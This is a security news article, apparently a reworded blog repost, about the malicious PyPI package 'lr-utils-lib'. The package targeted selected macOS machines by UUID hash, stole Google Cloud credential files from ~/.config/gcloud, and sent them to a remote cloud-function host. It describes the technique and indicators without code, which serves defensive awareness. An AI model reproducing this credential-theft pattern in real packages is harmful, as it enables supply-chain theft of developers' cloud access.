Deceptive PyPI Package Aims at macOS to Acquire Google Cloud Access

AndyC 27 July 2024

27 Jul, 2024NewsroomInformation Security / Cloud Security

Security experts have unveiled a malevolent bundle on the Python Package Index (PyPI) database that directly aims at Apple macOS systems to filch users’ Google Cloud logins from a sp

Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials

27 Jul, 2024NewsroomInformation Security / Cloud Security

Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials

Security experts have unveiled a malevolent bundle on the Python Package Index (PyPI) database that directly aims at Apple macOS systems to filch users’ Google Cloud logins from a specific group of targets.

The bundle, labeled “lr-utils-lib,” amassed a total of 59 installations before it was removed. The upload took place in the early days of June 2024.

“The malicious software leverages a set of preset hashes to pinpoint specific macOS devices and endeavors to gather Google Cloud validation information,” remarked Yehuda Gelb, a researcher at Checkmarx, in a report issued on Friday. “The harvested credentials get dispatched to a distant server.”

Information Security

An essential characteristic of the bundle is that it initially verifies its existence on a macOS system, and only after that proceeds to juxtapose the system’s Universally Unique Identifier (UUID) against a pre-set list of 64 hashes.

If the infected device falls within the specified selection, it endeavors to retrieve two particular files, namely application_default_credentials.json and credentials.db, stored in the ~/.config/gcloud directory, housing Google Cloud validation details.

Deceptive PyPI Package

The gathered data is subsequently transmitted via HTTP to a remote server at “europe-west2-workload-422915[.]cloudfunctions[.]net.”

Checkmarx also uncovered a fabricated profile on LinkedIn attributed to “Lucid Zenith,” mirroring the package’s possessor and falsely asserting to be the CEO of Apex Companies, hinting at a probable social engineering angle to the assault.

The mastermind behind this offense remains unidentified at this point. Nevertheless, this follows more than sixty days post the disclosure by security firm Phylum regarding another supply chain assault involving a Python package named “requests-darwin-lite” that likewise initiated its malevolent plans subsequent to UUID verification on macOS hosts.

These offensives indicate that threat actors possess prior insights into the macOS setups they target for infiltration and are extending great efforts to ensure that the harmful bundles are dispensed exclusively to those particular machines.

It signals the strategies malevolent actors deploy to circulate imitation bundles, with the goal of tricking developers into integrating them within their applications.

“The key targets might not be clear, whether aimed at individuals or corporations, these assaults could have a considerable impact on organizations,” Gelb iterated. “Although the initial breach generally commences on an individual developer’s device, the stakes for corporations could be momentous.”

Stumbled upon this piece? Stay connected with us on Twitter and LinkedIn for more exclusive contents.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts

Tags: , , , , , , , , ,

More Stories

The Case for Dynamic AI-SaaS Security as Copilots Scale

The Case for Dynamic AI-SaaS Security as Copilots Scale

AndyC 19 December 2025
Kimsuky Spreads DocSwap Android Malware via QR Phishing Posing as Delivery App

Kimsuky Spreads DocSwap Android Malware via QR Phishing Posing as Delivery App

AndyC 19 December 2025
CISA Flags Critical ASUS Live Update Flaw After Evidence of Active Exploitation

CISA Flags Critical ASUS Live Update Flaw After Evidence of Active Exploitation

AndyC 18 December 2025
Cisco Warns of Active Attacks Exploiting Unpatched 0-Day in AsyncOS Email Security Appliances

Cisco Warns of Active Attacks Exploiting Unpatched 0-Day in AsyncOS Email Security Appliances

AndyC 18 December 2025
SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances

SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances

AndyC 18 December 2025
Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks

Kimwolf Botnet Hijacks 1.8 Million Android TVs, Launches Large-Scale DDoS Attacks

AndyC 18 December 2025

You may have missed

What the Latest OpenAI Security Breach Reveals About the State of AI Protection 

The Power of Large Language Models for Cybersecurity 

AndyC 19 December 2025
The .5B Coursera-Udemy merger is being driven by AI speed

Self-Harm Prevention Kit Guide for Schools: Identifying Risks and Protecting Students

AndyC 19 December 2025
Blog-5-300x200-1.jpg

How To Spot Health Insurance Scams This Open Enrollment Season

AndyC 19 December 2025
U.S. CISA adds Cisco, SonicWall, and ASUS flaws to its Known Exploited Vulnerabilities catalog

U.S. CISA adds Cisco, SonicWall, and ASUS flaws to its Known Exploited Vulnerabilities catalog

AndyC 19 December 2025
GhostPairing campaign abuses WhatsApp device linking to hijack accounts

GhostPairing campaign abuses WhatsApp device linking to hijack accounts

AndyC 19 December 2025

Subscribe To InfoSec Today News

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

World Wide Crypto will use the information you provide on this form to be in touch with you and to provide updates and marketing.